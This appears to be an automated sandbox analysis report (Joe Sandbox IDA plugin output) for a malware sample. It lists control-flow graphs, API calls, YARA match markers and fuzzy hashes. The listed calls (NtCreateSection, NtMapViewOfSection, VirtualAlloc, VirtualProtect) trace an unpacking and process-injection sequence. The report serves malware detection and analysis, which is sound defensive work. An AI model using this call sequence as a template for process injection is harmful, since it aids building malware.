                                                                                                control_flow_graph 409 40161a-401632 call 40125c 415 401634 409->415 416 401637-40163c 409->416 415->416 418 401642-401653 416->418 419 401959-401961 416->419 423 401957 418->423 424 401659-401682 418->424 419->416 422 401966-4019af call 40125c 419->422 423->422 424->423 431 401688-40169f NtDuplicateObject 424->431 431->423 433 4016a5-4016c9 NtCreateSection 431->433 435 401725-40174b NtCreateSection 433->435 436 4016cb-4016ec NtMapViewOfSection 433->436 435->423 439 401751-401755 435->439 436->435 438 4016ee-40170a NtMapViewOfSection 436->438 438->435 441 40170c-401722 438->441 439->423 442 40175b-40177c NtMapViewOfSection 439->442 441->435 442->423 444 401782-40179e NtMapViewOfSection 442->444 444->423 447 4017a4 call 4017a9 444->447
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 1546783058-0
                                                                                                • Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                • Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
                                                                                                • Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
                                                                                                • Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 450 2e52564-2e5257d 451 2e5257f-2e52581 450->451 452 2e52583 451->452 453 2e52588-2e52594 CreateToolhelp32Snapshot 451->453 452->453 454 2e525a4-2e525b1 Module32First 453->454 455 2e52596-2e5259c 453->455 456 2e525b3-2e525b4 call 2e52223 454->456 457 2e525ba-2e525c2 454->457 455->454 460 2e5259e-2e525a2 455->460 461 2e525b9 456->461 460->451 460->454 461->457
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E5258C
                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 02E525AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e4b000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 3833638111-0
                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction ID: 362734425a780527dd53054b1ce57eb59919fa54082e502f4eb05afd0aa5ecbf
                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                • Instruction Fuzzy Hash: 41F0F6355507216FD7203BF4A89DB6E72E8FF48229F105128FF43910C0DB70E8054A62

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 463 4017df-4017e7 NtMapViewOfSection 465 401782-40179e NtMapViewOfSection 463->465 466 401957-4019af call 40125c 463->466 465->466 468 4017a4 call 4017a9 465->468
                                                                                                APIs
                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: Section$View$CreateDuplicateObject
                                                                                                • String ID:
                                                                                                • API String ID: 3617974760-0
                                                                                                • Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                • Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
                                                                                                • Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
                                                                                                • Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 2e2003c-2e20047 1 2e20049 0->1 2 2e2004c-2e20263 call 2e20a3f call 2e20e0f call 2e20d90 VirtualAlloc 0->2 1->2 17 2e20265-2e20289 call 2e20a69 2->17 18 2e2028b-2e20292 2->18 23 2e202ce-2e203c2 VirtualProtect call 2e20cce call 2e20ce7 17->23 20 2e202a1-2e202b0 18->20 22 2e202b2-2e202cc 20->22 20->23 22->20 29 2e203d1-2e203e0 23->29 30 2e203e2-2e20437 call 2e20ce7 29->30 31 2e20439-2e204b8 VirtualFree 29->31 30->29 33 2e205f4-2e205fe 31->33 34 2e204be-2e204cd 31->34 37 2e20604-2e2060d 33->37 38 2e2077f-2e20789 33->38 36 2e204d3-2e204dd 34->36 36->33 40 2e204e3-2e20505 36->40 37->38 43 2e20613-2e20637 37->43 41 2e207a6-2e207b0 38->41 42 2e2078b-2e207a3 38->42 52 2e20517-2e20520 40->52 53 2e20507-2e20515 40->53 44 2e207b6-2e207cb 41->44 45 2e2086e-2e208be LoadLibraryA 41->45 42->41 46 2e2063e-2e20648 43->46 48 2e207d2-2e207d5 44->48 51 2e208c7-2e208f9 45->51 46->38 49 2e2064e-2e2065a 46->49 54 2e207d7-2e207e0 48->54 55 2e20824-2e20833 48->55 49->38 50 2e20660-2e2066a 49->50 56 2e2067a-2e20689 50->56 58 2e20902-2e2091d 51->58 59 2e208fb-2e20901 51->59 60 2e20526-2e20547 52->60 53->60 61 2e207e2 54->61 62 2e207e4-2e20822 54->62 57 2e20839-2e2083c 55->57 63 2e20750-2e2077a 56->63 64 2e2068f-2e206b2 56->64 57->45 65 2e2083e-2e20847 57->65 59->58 66 2e2054d-2e20550 60->66 61->55 62->48 63->46 69 2e206b4-2e206ed 64->69 70 2e206ef-2e206fc 64->70 71 2e2084b-2e2086c 65->71 72 2e20849 65->72 67 2e205e0-2e205ef 66->67 68 2e20556-2e2056b 66->68 67->36 74 2e2056f-2e2057a 68->74 75 2e2056d 68->75 69->70 76 2e2074b 70->76 77 2e206fe-2e20748 70->77 71->57 72->45 78 2e2059b-2e205bb 74->78 79 2e2057c-2e20599 74->79 75->67 76->56 77->76 84 2e205bd-2e205db 78->84 79->84 84->66
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E2024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e20000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: bf7558aa261c7e9f0bf3ab8e2195609813a6ede93c7c4eb9cfb164d9dfac32cf
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: 13526B75A41229DFDB64CF58C984BACBBB1BF09314F1480D9E54DAB391DB30AA89CF14

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 481 2e20e0f-2e20e24 SetErrorMode * 2 482 2e20e26 481->482 483 2e20e2b-2e20e2c 481->483 482->483
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02E20223,?,?), ref: 02E20E19
                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02E20223,?,?), ref: 02E20E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e20000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 00dfb41ce48c535117d73a9952129246be58987ed129c26202745da8aced8991
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: D5D0123114512877DB002A94DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 484 4019b2-4019bb 485 4019c3-401a19 call 40125c Sleep call 4014de 484->485 486 4019cd 484->486 498 401a28-401a77 call 40125c 485->498 499 401a1b-401a23 call 4015d5 485->499 486->485 499->498
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                • Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
                                                                                                • Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
                                                                                                • Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 513 4019cc-401a19 call 40125c Sleep call 4014de 527 401a28-401a77 call 40125c 513->527 528 401a1b-401a23 call 4015d5 513->528 528->527
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                • Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
                                                                                                • Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
                                                                                                • Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 542 4019be-401a19 call 40125c Sleep call 4014de 555 401a28-401a77 call 40125c 542->555 556 401a1b-401a23 call 4015d5 542->556 556->555
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                • Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
                                                                                                • Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
                                                                                                • Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                • Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
                                                                                                • Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
                                                                                                • Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A04
                                                                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
                                                                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4152845823-0
                                                                                                • Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                • Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
                                                                                                • Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
                                                                                                • Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E52274
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e4b000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: 50a0d5ef62a5be6c7cca09a7297543447aacd389ddee97bed3d7e8e659788b7b
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 18112B79A40208EFDB01DF98C985E98BBF5AF08350F05C094FA489B361D371EA50DF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e20000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                • API String ID: 0-2784972518
                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction ID: 0622ab01cf25bf12907810ddac50a8e0dcdeee675db74ab547301bf2114fc0e0
                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                • Instruction Fuzzy Hash: 583149B6901619DFDB10CF99C880AAEBBF5FF58328F14904AD442B7250D771EA49CFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e1da0c634a6d92d1791599be49c0a92e0b08a68521384ec08f651e4fd3c29d3
                                                                                                • Instruction ID: b0f5cd621e5889a427523276a520302fa0894c53478b04dc76a98a6104f30da4
                                                                                                • Opcode Fuzzy Hash: 6e1da0c634a6d92d1791599be49c0a92e0b08a68521384ec08f651e4fd3c29d3
                                                                                                • Instruction Fuzzy Hash: 7D41CE632141086B9A41D2183D2709E3BE59BE235CB249BE7C973773FDD1A4C817A1D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b997c0b0ad5099bc85e104db20f3434f9bfef6f8188c5eb21619fd16353aaaa8
                                                                                                • Instruction ID: c68037642d2b4b88848a758ef480b741a8d613f7c2e242108568ac126d1cc187
                                                                                                • Opcode Fuzzy Hash: b997c0b0ad5099bc85e104db20f3434f9bfef6f8188c5eb21619fd16353aaaa8
                                                                                                • Instruction Fuzzy Hash: CB41CE63214108679A41D2183D2709E3AE59BE225CB249BE7C973773FDD1A4C817A1D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d86b63182e58497ce22eab269b34fa37a60eac9ab51381e0997a6561d36ce3a1
                                                                                                • Instruction ID: c31f878e4552ee647901d08c13c42c7b9bee46c5546bcd0e406724342d5d4055
                                                                                                • Opcode Fuzzy Hash: d86b63182e58497ce22eab269b34fa37a60eac9ab51381e0997a6561d36ce3a1
                                                                                                • Instruction Fuzzy Hash: D541CC632101086BDA41C7186C2709D3BE5ABE625CB25ABDAC9736B3FED164C817A183
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8b384b0ee208d3d6171e22600c510dc0043140f89b51a070c79228909bba0109
                                                                                                • Instruction ID: f27c93ea5fb19a9126cdec7dfb901a61f64bd232b99ff7c89ab316a302d0d062
                                                                                                • Opcode Fuzzy Hash: 8b384b0ee208d3d6171e22600c510dc0043140f89b51a070c79228909bba0109
                                                                                                • Instruction Fuzzy Hash: 3231BC532101046B9E41C7183C2308E3AE5EFE265CB24ABDAC873673FDD160C81BA1C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f652c5a769f7022461051059d30ad15d808e24512e8e9a39d5a36b1a3943f30e
                                                                                                • Instruction ID: 71e4ad84544b767bcf39e9c9c4391c0157840b4eb49ede458eb3363319ddbd63
                                                                                                • Opcode Fuzzy Hash: f652c5a769f7022461051059d30ad15d808e24512e8e9a39d5a36b1a3943f30e
                                                                                                • Instruction Fuzzy Hash: 7C31BB532201086B5E41C7283C2308E3BE6EBE626CB25AFC6C873673FDD550C81BA0D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b4459f28dd9a1f9efe99075b70b48fb1a8b60b7d1a7da5155ac1ea3fa4accf4
                                                                                                • Instruction ID: b6ca5711a50b7efee0159f302846c4b9acddd6f1e8c6f36e454589e31c9923f4
                                                                                                • Opcode Fuzzy Hash: 7b4459f28dd9a1f9efe99075b70b48fb1a8b60b7d1a7da5155ac1ea3fa4accf4
                                                                                                • Instruction Fuzzy Hash: 7C3167532115086B5F41D7286C2308E3BE6ABE626DB15ABC6C873673FED550C82BA1D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8390d9e052f2bd0000ec68267d667f6d37540f8d2bf5ab16a5193d2387661f5d
                                                                                                • Instruction ID: 20921a196d2f70f336c197afbd25194a591e440cc2018bb72a27b8d2cfd76f32
                                                                                                • Opcode Fuzzy Hash: 8390d9e052f2bd0000ec68267d667f6d37540f8d2bf5ab16a5193d2387661f5d
                                                                                                • Instruction Fuzzy Hash: D4215A73615264CBD3019B18914B45177F0FF81348B2044BBCC83AB2E2D6F9C957969B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e4b000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction ID: 4d96498d11094c8314e594288b62f3bbc9249a368a535a05ea26f35962193d7a
                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction Fuzzy Hash: FA11CE72390110AFD740DF55DCD0FA673EAEB88224B198065ED08CF305EAB5EC01CB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2e20000_file.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction ID: d2a9083595d6ee6a256dc2e8d6a0012d07527aa321de95ca19ac6d920076e272
                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction Fuzzy Hash: B701F7766516108FDF21CF20C804BAA33F5EB96309F0590A4D507972C1E370A9458B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
                                                                                                • Instruction ID: 69d4b880b733b20b6e6e8d40225c1187dfda2853922bf69f6b380452bfed4421
                                                                                                • Opcode Fuzzy Hash: dce77baa00da61873ccb3aa1e018f8e5fad55bea42f980cc92786ab105a08859
                                                                                                • Instruction Fuzzy Hash: 95D0A7321D8ABD0E873BAF242405B4B3F91F99D4807D4158CC4D2CF189CB20D593DB84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
                                                                                                • Instruction ID: a8b0c3d885e26e12b4b78e6b62be43aeff16635af6dcc451826105f71ea5402b
                                                                                                • Opcode Fuzzy Hash: f58bfef414fbb703d3dd54ed49dc08676aa3255ce4442ffadb9c2f16a394118f
                                                                                                • Instruction Fuzzy Hash: E2C02B722C1E336B9B08A10C8CE2BDFF6885936400388100444C2D72C0C300E05304F7
                                                                                                Memory Dump Source
